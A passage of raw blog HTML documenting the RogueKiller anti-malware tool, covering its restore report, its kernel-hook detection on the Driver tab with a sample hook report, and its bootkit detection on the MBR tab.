&lt;table border="1" cellpadding="5" cellspacing="1" style="margin-left: auto; margin-right: auto; text-align: left;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;div style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;¤¤¤ File attributes restored: ¤¤¤&lt;/span&gt;
&lt;br /&gt;
&lt;span style="color: #0b5394;"&gt;Desktop: Success 6675 / Fail 0&lt;br /&gt;
Quick launch: Success 7 / Fail 0&lt;br /&gt;
Programs: Success 24786 / Fail 0&lt;br /&gt;
Start menu: Success 430 / Fail 0&lt;br /&gt;
User profile: Success 6583 / Fail 0&lt;br /&gt;
My documents: Success 131315 / Fail 0&lt;br /&gt;
My favourites: Success 8 / Fail 0&lt;br /&gt;
My pictures: Success 0 / Fail 0&lt;br /&gt;
My music: Success 0 / Fail 0&lt;br /&gt;
My videos: Success 0 / Fail 0&lt;br /&gt;
Local drives: Success 44060 / Fail 0&lt;br /&gt;Backup: [FOUND] Success 125468 / Fail 0 / Exists 1&lt;br /&gt;&lt;br /&gt;Drives:&lt;br /&gt;[C:] \Device\HarddiskVolume1 -- 0x3 --&amp;gt; Restored&lt;br /&gt;[D:] \Device\CdRom0 -- 0x5 --&amp;gt; Skipped&lt;br /&gt;[Z:] \Device\VBoxMiniRdr\;Z:\VBOXSVR\Shared -- 0x4 --&amp;gt; Skipped&lt;/span&gt; 
&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Once the reset finished, a &lt;b&gt;text report is available&lt;/b&gt; by clicking on the &lt;i&gt;&lt;b&gt;Rep&lt;/b&gt;&lt;/i&gt;&lt;span style="font-size: small;"&gt;&lt;i&gt;&lt;b&gt;ort &lt;/b&gt;&lt;/i&gt;button.&lt;/span&gt; It is also available on the desktop&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt; (RKReport[#]&lt;span style="font-size: small;"&gt;.txt).&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-CClHciuXkQ4/UIpYW2-FcJI/AAAAAAAAAQ8/EZvJfVvRWyY/s1600/raccourcis.png" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="480" src="http://3.bp.blogspot.com/-CClHciuXkQ4/UIpYW2-FcJI/AAAAAAAAAQ8/EZvJfVvRWyY/s640/raccourcis.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Shortcut fix&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h2 style="text-align: left;"&gt;
&lt;span style="color: #741b47;"&gt;&lt;span style="font-size: large;"&gt;&lt;i&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: large;"&gt;DRIVER TAB&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="font-size: large;"&gt;&lt;i&gt;&amp;nbsp;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;The &lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;i&gt;&lt;b&gt;Driver &lt;/b&gt;&lt;/i&gt;tab shows all informations of the &lt;i&gt;&lt;b&gt;TrueSight &lt;/b&gt;&lt;/i&gt;module&lt;span style="font-size: small;"&gt;, the kernel driver of RogueKiller. The driver is mostly used for &lt;b&gt;searching rootkits in the &lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Windows kernel&lt;/b&gt;. &lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;T&lt;/span&gt;he &lt;span style="font-size: small;"&gt;resear&lt;span style="font-size: small;"&gt;ch is &lt;span style="font-size: small;"&gt;done is se&lt;span style="font-size: small;"&gt;veral sections&lt;span style="font-size: small;"&gt;:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt; &lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;- &lt;b&gt;&lt;a href="http://en.wikipedia.org/wiki/System_Service_Dispatch_Table"&gt;System Service Dispatch Table&lt;/a&gt;&lt;/b&gt; (SSDT)&amp;nbsp; &lt;span style="font-size: small;"&gt;- Shows the hooked &lt;span style="font-size: small;"&gt;&lt;a href="http://en.wikipedia.org/wiki/Application_programming_interface"&gt;APIs&lt;/a&gt;&lt;span style="font-size: small;"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;- &lt;b&gt;Shadow SSDT&lt;/b&gt; (S_SSDT) - Shows t&lt;span style="font-size: small;"&gt;he hooked &lt;/span&gt;API&lt;span style="font-size: small;"&gt;s&lt;span style="font-size: small;"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;- &lt;b&gt;Inline SSDT&lt;/b&gt; - &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Shows t&lt;span style="font-size: small;"&gt;he &lt;/span&gt;API&lt;span style="font-size: small;"&gt;s&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; hooked with hot patching.&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;- &lt;b&gt;&lt;a href="http://en.wikipedia.org/wiki/I/O_request_packets"&gt;IRP&lt;/a&gt;&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt; hook&lt;/b&gt; - Shows the drivers with hooked major functions&lt;span style="font-size: small;"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;It&lt;span style="font-size: small;"&gt;'s possible to &lt;span style="font-size: small;"&gt;&lt;b&gt;deactivate the rootkit scan&lt;/b&gt; by unchecking the &lt;b&gt;&lt;i&gt;Antirootkit &lt;/i&gt;&lt;/b&gt;checkbox&lt;span style="font-size: small;"&gt; before to start the scan.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;a href="http://4.bp.blogspot.com/-9YgmPPu3vyU/UJPZnC6rokI/AAAAAAAAARc/0_PaV5A5cDw/s1600/Capture3.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="482" src="http://4.bp.blogspot.com/-9YgmPPu3vyU/UJPZnC6rokI/AAAAAAAAARc/0_PaV5A5cDw/s640/Capture3.PNG" width="640" /&gt;&lt;/a&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
It's possible to &lt;b&gt;restore some hooks (SSDT and Inline SSDT) by right click on a line, &lt;i&gt;restore&lt;/i&gt;&lt;/b&gt;. If the hook is legit (some antivirus use these tips) then it will not be possible to restore the hook. RogueKiller maintains a whitelist of drivers, but it's possible some don't appears as legit while they are (please tell me if you face such thing).&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-9YgmPPu3vyU/UJPZnC6rokI/AAAAAAAAARc/0_PaV5A5cDw/s1600/Capture3.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-klZLj-6-nRE/UJPZmUSjFVI/AAAAAAAAARY/TcyjH3dbSww/s1600/Capture2.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="248" src="http://3.bp.blogspot.com/-klZLj-6-nRE/UJPZmUSjFVI/AAAAAAAAARY/TcyjH3dbSww/s640/Capture2.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
The kernel hooks (legit or not) are listed in the report too, in the Driver section. We can get the API name, its address, and the name of the hooking drivers.&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;table border="1" cellpadding="5" cellspacing="1" style="margin-left: auto; margin-right: auto; text-align: left;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;div style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;¤¤¤ Driver : [LOADED] ¤¤¤
&lt;br /&gt;SSDT[119] : NtOpenKey @ 0x80624BA6 -&amp;gt; HOOKED (\??\C:\WINDOWS\TEMP\rqmqbqga.&lt;/span&gt;&lt;wbr&gt;&lt;/wbr&gt;&lt;span style="color: #0b5394;"&gt;sys @ 0xF783E562)&lt;br /&gt;SSDT[57] : NtDebugActiveProcess @ 0x80643B3E -&amp;gt; HOOKED (Unknown @ 0x89C30200)
&lt;br /&gt;SSDT[68] : NtDuplicateObject @ 0x805BE010 -&amp;gt; HOOKED (Unknown @ 0x89C302F0)
&lt;br /&gt;SSDT[277] : NtWriteVirtualMemory @ 0x805B43D4 -&amp;gt; HOOKED (Unknown @ 0x89C306D0)
&lt;br /&gt;IRP[IRP_MJ_CREATE] : Unknown -&amp;gt; HOOKED ([MAJOR] atapi.sys @ 0xB7DF3B40)
&lt;br /&gt;IRP[IRP_MJ_CLOSE] : Unknown -&amp;gt; HOOKED ([MAJOR] atapi.sys @ 0xB7DF3B40)
&lt;br /&gt;IRP[DriverStartIo] : Unknown -&amp;gt; HOOKED ([MAJOR] atapi.sys @ 0xB7DF1864)
&lt;/span&gt; 
&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h2 style="text-align: left;"&gt;
&lt;span style="color: #741b47;"&gt;&lt;span style="font-size: large;"&gt;&lt;i&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: large;"&gt;MBR TAB&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="font-size: large;"&gt;&lt;i&gt;&amp;nbsp;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;The MBR tab&lt;span style="font-size: small;"&gt; displays informations a&lt;span style="font-size: small;"&gt;bout the&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;a href="http://en.wikipedia.org/wiki/Master_boot_record"&gt;Master Boot Reco&lt;/a&gt;&lt;span style="font-size: small;"&gt;&lt;a href="http://fr.wikipedia.org/wiki/Master_boot_record"&gt;rd&lt;/a&gt; (MBR) of the PC. This is the very &lt;b&gt;first sector &lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;on the har&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;d drive&lt;/b&gt;, which contains&lt;span style="font-size: small;"&gt; &lt;/span&gt;both &lt;b&gt;informations a&lt;span style="font-size: small;"&gt;b&lt;/span&gt;out t&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;he size/location of partitions&lt;/b&gt; and &lt;span style="font-size: small;"&gt;a &lt;b&gt;bootstrap code&lt;/b&gt;&lt;span style="font-size: small;"&gt;, wh&lt;span style="font-size: small;"&gt;ich permit&lt;span style="font-size: small;"&gt;s to launch the operati&lt;span style="font-size: small;"&gt;ng system of a bootable disk&lt;span style="font-size: small;"&gt;.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Some malwares known&lt;span style="font-size: small;"&gt; as&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;i&gt;&lt;b&gt;Bootkit&lt;/b&gt;&lt;/i&gt;, &lt;span style="font-size: small;"&gt;like&amp;nbsp;&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Alureon"&gt;TDSS&lt;/a&gt;, Max&lt;span style="font-size: small;"&gt;SST&lt;span style="font-size: small;"&gt; o&lt;span style="font-size: small;"&gt;r &lt;a href="http://korben.info/stoned-bootkit-le-premier-bootkit-open-source-qui-va-faire-mal.html"&gt;Stoned&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; &lt;span style="font-size: small;"&gt;modify&lt;span style="font-size: small;"&gt; either the code&lt;/span&gt;&lt;/span&gt; (bootstrap)&lt;span style="font-size: small;"&gt; to launch their o&lt;span style="font-size: small;"&gt;wn modules, or the partition table to boot on a fake partition and do some &lt;span style="font-size: small;"&gt;processing right before the operating system starts (and the antivirus p&lt;span style="font-size: small;"&gt;ro&lt;span style="font-size: small;"&gt;tections!)&lt;span style="font-size: small;"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;RogueKiller allows to &lt;span style="font-size: small;"&gt;detect and remove&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;bootkits&lt;/b&gt;&lt;span style="font-size: small;"&gt;, &lt;span style="font-size: small;"&gt;even when they try to hide themsel&lt;span style="font-size: small;"&gt;ves&lt;span style="font-size: small;"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Some&lt;span style="font-size: small;"&gt; hints ca&lt;span style="font-size: small;"&gt;n &lt;/span&gt;show that a MBR is legit&lt;/span&gt;&lt;span style="font-size: small;"&gt;: The boot&lt;span style="font-size: small;"&gt;strap is kno&lt;span style="font-size: small;"&gt;wn, &lt;span style="font-size: small;"&gt;and legit&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;.&lt;span style="font-size: small;"&gt; &lt;span style="font-size: small;"&gt;Then&lt;span style="font-size: small;"&gt;, &lt;/span&gt;the different attempts &lt;span style="font-size: small;"&gt;to read the MBR (at different levels) return the same result&lt;span style="font-size: small;"&gt;s&lt;span style="font-size: small;"&gt; (this means the MBR is not hidden)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; &lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Here's an &lt;span style="font-size: small;"&gt;example of clean MBR. The &lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;bootst&lt;span style="font-size: small;"&gt;rap (BSP) is legit (Windows XP), and the User &lt;span style="font-size: small;"&gt;rea&lt;span style="font-size: small;"&gt;d,&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt; LL1 &lt;span style="font-size: small;"&gt;and&lt;/span&gt; LL2 return the same&lt;span style="font-size: small;"&gt; 